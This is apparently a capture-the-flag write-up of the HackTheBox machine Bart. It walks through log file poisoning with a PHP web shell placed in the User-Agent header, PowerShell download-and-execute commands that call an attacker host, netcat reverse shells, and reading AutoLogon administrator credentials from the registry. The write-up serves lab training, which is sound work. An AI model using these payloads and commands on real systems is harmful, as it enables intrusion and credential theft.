We covered Log File Poisoning and Windows Privilege Escalation by exploiting the auto-logon in Windows which saves credentials in plaintext. This was part of HackTheBox Bart
BART is a WINDOWS machine, and is of MEDIUM difficulty.
Initial Enumeration
I started with an Nmap scan, which revealed an open port 80 running Microsoft Internet Information Service (IIS) version 10. The scan also indicated a redirect to forum.par.htb
, so I added this and other related hostnames (monitor.bart
, internal01.bart
) to my /etc/hosts
file. Browsing to forum.bart.htb
led to a WordPress site. I attempted to access wp-admin
but encountered an internal server error. By viewing the page source, I found an email address for a developer, Harvey Potter (H.Potter@...
), and deduced the email naming convention for other team members (e.g., S.Brown
, D.Simons
, R.Hilton
).
Directory Brute-forcing and Login
I used gobuster
to find hidden directories and discovered /monitor
and /forum
. Navigating to bart.htb/monitor
redirected to a login form. Using the “Forgot Password” functionality, I confirmed that the username format was the first name (e.g., “Harvey”). I guessed the password for “Harvey” as “Potter” (his surname) and successfully logged in. This was likely simplified due to the presence of a CSRF token that would complicate automated brute-forcing.
Internal Chat and Source Code Analysis
Inside the monitor portal, an “Internal Chat” link led to internal01.bart
. This new page had another login form for a “Simple Chat” application. By inspecting the CSS, I found the author of the application. Googling “Simple Chat” led me to its source code on GitHub. The source code revealed a registration functionality (register.php
) that accepted uname
and password
parameters via a POST request. I used curl
to send a POST request and register a new user.
Log File Poisoning
After logging into the chat application, I noticed a “Log” button. Intercepting the request with Burp Suite showed that clicking “Log” sent a request to log/log.php
, which wrote details (date, username, user-agent) to log/log.txt
. The username was hardcoded as “Harvey”. I realized this was an opportunity for log file poisoning. By manipulating the User-Agent header, I could inject PHP code. First, I injected a simple PHP shell: <?php system($_GET['CMD']); ?>
into the User-Agent. Accessing log/log.php?CMD=whoami
confirmed command execution.
Gaining Initial Access (Reverse Shell)
I set up a Python HTTP server to host a Nishang PowerShell reverse shell script (invoke_powershell_tcp.ps1
). I modified the script with my IP address and a listening port. Using the log poisoning vulnerability, I crafted a PowerShell command to download and execute the reverse shell script from my server. I started a netcat
listener and successfully received a reverse shell.
Privilege Escalation
The initial shell was running as a low-privilege user. I checked privileges with whoami /priv
and found SeImpersonatePrivilege
was enabled, suggesting Juicy Potato could be an option, but I chose a different path. I mentioned that running WinPEAS would reveal an “AutoLogon” vulnerability where administrator credentials are stored in the registry. The initial netcat
shell was 32-bit, causing issues with some commands. I downloaded a 64-bit nc64.exe
to the target machine and started a new, more stable 64-bit reverse shell.
I then queried the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
to retrieve the plaintext DefaultUserName
(Administrator) and DefaultPassword
. Using PowerShell, I created credential objects with the retrieved administrator username and password. I prepared another Nishang reverse shell script (shell1.ps1
) with a different port. Finally, I used Invoke-Command
with the -Credential
parameter (using the admin credentials) and -ComputerName localhost
to download and execute the new reverse shell script. This provided a new reverse shell running as the Administrator, allowing me to access the root flag.
Technical Commands
nmap <target_ip>
cat /etc/hosts
gobuster dir -u http://forum.bart.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt --exclude-length 150,693
curl -X POST -d "uname=myname&password=password123" http://internal01.bart/simplechat/register.php
http://internal01.bart/log/log.txt
(Accessing log file)http://internal01.bart/log/log.php
(Accessing PHP info via poisoned log)http://internal01.bart/log/log.php?CMD=whoami
(Executing command via poisoned log)ls
cd shells
cd nishang
cp Invoke-PowerShellTcp.ps1 ../../shell.ps1
ifconfig
orip a
python3 -m http.server 8000
powershell -ep bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell.ps1')"
(PowerShell download and execute via log poisoning)nc -lvnp 4545
(Netcat listener)whoami /priv
powershell -c "Invoke-WebRequest -Uri http://<attacker_ip>:8000/nc64.exe -OutFile nc64.exe"
(PowerShell command to downloadnc64.exe
)./nc64.exe <attacker_ip> 4546 -e powershell.exe
(To start a 64-bit reverse shell)reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
(Registry query for AutoLogon credentials)reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
$UserName = "Bart\Administrator"
(PowerShell command to create credential object)$Password = ConvertTo-SecureString "THE_RETRIEVED_PASSWORD" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential($UserName, $Password)
cp shell.ps1 shell1.ps1
nano shell1.ps1
nc -lvnp 4547
Invoke-Command -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell1.ps1') } -Credential $Cred -ComputerName localhost
(PowerShell command to execute reverse shell as Administrator)cd ..
ls
cd Desktop
type root.txt